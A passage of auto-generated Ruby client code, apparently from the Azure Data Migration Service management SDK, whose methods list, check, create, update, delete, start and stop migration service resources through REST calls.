# Serialize Request
request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityRequest.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkNameAvailability'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityResponse.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<DataMigrationService>] operation results.
#
def list_by_resource_group(group_name, custom_headers:nil)
first_page = list_by_resource_group_as_lazy(group_name, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_group_with_http_info(group_name, custom_headers:nil)
list_by_resource_group_async(group_name, custom_headers:custom_headers).value!
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_group_async(group_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<DataMigrationService>] operation results.
#
def list(custom_headers:nil)
first_page = list_as_lazy(custom_headers:custom_headers)
first_page.get_all_items
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(custom_headers:nil)
list_async(custom_headers:custom_headers).value!
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/services'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Check name validity and availability
#
# This method checks whether a proposed top-level resource name is valid and
# available.
#
# @param location [String] The Azure region of the operation
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [NameAvailabilityResponse] operation results.
#
def check_name_availability(location, parameters, custom_headers:nil)
response = check_name_availability_async(location, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Check name validity and availability
#
# This method checks whether a proposed top-level resource name is valid and
# available.
#
# @param location [String] The Azure region of the operation
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def check_name_availability_with_http_info(location, parameters, custom_headers:nil)
check_name_availability_async(location, parameters, custom_headers:custom_headers).value!
end
#
# Check name validity and availability
#
# This method checks whether a proposed top-level resource name is valid and
# available.
#
# @param location [String] The Azure region of the operation
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def check_name_availability_async(location, parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, 'location is nil' if location.nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityRequest.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/locations/{location}/checkNameAvailability'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'location' => location},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityResponse.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def begin_create_or_update(parameters, group_name, service_name, custom_headers:nil)
response = begin_create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_or_update_with_http_info(parameters, group_name, service_name, custom_headers:nil)
begin_create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
end
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_or_update_async(parameters, group_name, service_name, custom_headers:nil)
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200 || status_code == 201 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
# Deserialize Response
if status_code == 201
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
response = begin_delete_async(group_name, service_name, delete_running_tasks:delete_running_tasks, custom_headers:custom_headers).value!
nil
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_with_http_info(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
begin_delete_async(group_name, service_name, delete_running_tasks:delete_running_tasks, custom_headers:custom_headers).value!
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_async(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'deleteRunningTasks' => delete_running_tasks,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200 || status_code == 202 || status_code == 204
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Create or update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def begin_update(parameters, group_name, service_name, custom_headers:nil)
response = begin_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Create or update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_with_http_info(parameters, group_name, service_name, custom_headers:nil)
begin_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
end
#
# Create or update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_async(parameters, group_name, service_name, custom_headers:nil)
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:patch, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_start(group_name, service_name, custom_headers:nil)
response = begin_start_async(group_name, service_name, custom_headers:custom_headers).value!
nil
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_start_with_http_info(group_name, service_name, custom_headers:nil)
begin_start_async(group_name, service_name, custom_headers:custom_headers).value!
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_start_async(group_name, service_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/start'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_stop(group_name, service_name, custom_headers:nil)
response = begin_stop_async(group_name, service_name, custom_headers:custom_headers).value!
nil
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_stop_with_http_info(group_name, service_name, custom_headers:nil)
begin_stop_async(group_name, service_name, custom_headers:custom_headers).value!
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_stop_async(group_name, service_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/stop'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ServiceSkuList] operation results.
#
def list_skus_next(next_page_link, custom_headers:nil)
response = list_skus_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_skus_next_with_http_info(next_page_link, custom_headers:nil)
list_skus_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_skus_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
